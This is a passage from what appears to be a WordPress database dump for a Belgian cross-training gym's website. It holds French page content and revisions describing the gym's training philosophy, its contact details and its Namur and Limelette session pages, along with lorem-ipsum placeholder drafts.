src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'publish', 'closed', 'open', '', 'notre-philosophie', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=5', 0, 'page', '', 0),
(6, 1, '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:10:53', '2013-05-23 18:10:53', '', 5, 'http://www.crosstrainingcenter.be/?p=6', 0, 'revision', '', 0),
(358, 1, '2013-11-04 17:18:57', '2013-11-04 17:18:57', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-11-04 17:18:57', '2013-11-04 17:18:57', '', 5, 'http://www.crosstrainingcenter.be/5-revision-v1/', 0, 'revision', '', 0),
(36, 1, '2013-06-13 16:24:45', '2013-06-13 16:24:45', 'Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle, en privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis. Ce dosage subtil définit la qualité de l\'entraînement. Ces 3 buts sont :\r\n<p align=\"center\"><b>PREVENIR</b> – <b>AMELIORER</b> – <b>RECUPERER</b>.</p>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p align=\"center\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-13 16:24:45', '2013-06-13 16:24:45', '', 5, 'http://www.crosstrainingcenter.be/?p=36', 0, 'revision', '', 0),
(37, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 11, 'http://www.crosstrainingcenter.be/?p=37', 0, 'revision', '', 0),
(8, 1, '2013-05-23 18:11:16', '2013-05-23 18:11:16', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 18:11:16', '2013-05-23 18:11:16', '', 5, 'http://www.crosstrainingcenter.be/?p=8', 0, 'revision', '', 0),
(9, 1, '2013-05-23 18:13:57', '2013-05-23 18:13:57', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1>Namur</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+Namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.472583,4.860764&amp;spn=0.065552,0.102997&amp;z=12&amp;iwloc=A&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n\r\n<address>Bowling et Squash de Namur\r\nChaussée de Perwez, 251\r\n5002 Namur</address><address><a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></address></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%; text-align: center;\">\r\n<h1></h1>\r\n<h1>Prise de RDV :</h1>\r\nLes réservations de Team Training se font en ligne : <a href=\"http://reservation.crosstrainingcenter.be\" target=\"_blank\">http://reservation.crosstrainingcenter.be</a>\r\nLes séances de Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n0485 / 92 . 02 . 12\r\n<h1></h1>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\"></h1>', 'Contact', '', 'publish', 'closed', 'open', '', 'contact', '', '', '2015-04-21 09:07:44', '2015-04-21 09:07:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=9', 0, 'page', '', 0),
(10, 1, '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 18:13:13', '2013-05-23 18:13:13', '', 9, 'http://www.crosstrainingcenter.be/?p=10', 0, 'revision', '', 0),
(11, 1, '2013-05-23 18:14:55', '2013-05-23 18:14:55', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www.crosstrainingcenter.be/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'publish', 'closed', 'open', '', 'les-seances', '', '', '2013-11-04 17:38:55', '2013-11-04 17:38:55', '', 0, 'http://www.crosstrainingcenter.be/?page_id=11', 0, 'page', '', 0),
(366, 1, '2013-11-04 17:23:16', '2013-11-04 17:23:16', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1></h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" usemap=\"#imagemap\" width=\"300\" height=\"236\" />\r\n\r\n<map id=\"Map\" name=\"imagemap\"> <area coords=\"90,84,166,108\" shape=\"namur\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\"\" /> <area coords=\"174,121,233,132\" shape=\"limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\" /> </map>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:23:16', '2013-11-04 17:23:16', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(360, 1, '2013-11-04 17:19:48', '2013-11-04 17:19:48', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www2.crosstrainingcenter.be/les-seances/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>&nbsp;</h1>\r\n<h1 style=\"text-align: center;\">Choix d\'une salle</h1>\r\n<img class=\"size-full wp-image-446 aligncenter\" alt=\"map\" src=\"http://www2.crosstrainingcenter.be/wp-content/uploads/2013/11/map.png\" width=\"300\" height=\"236\" usemap=\"#imagemap\" />\r\n\r\n                        <map name=\"imagemap\" id=\"Map\"> \r\n                        <area shape=\"namur\" coords=\"90,84,166,108\" href=\"http://www2.crosstrainingcenter.be/les-seances-limelette/\" /> \r\n                        <area shape=\"limelette\" coords=\"174,121,233,132\" href=\"http://www2.crosstrainingcenter.be/les-seances/\" /> \r\n                        </map> \r\n', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-11-04 17:19:48', '2013-11-04 17:19:48', '', 11, 'http://www.crosstrainingcenter.be/11-revision-v1/', 0, 'revision', '', 0),
(361, 1, '2013-11-04 17:20:34', '2013-11-04 17:20:34', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td 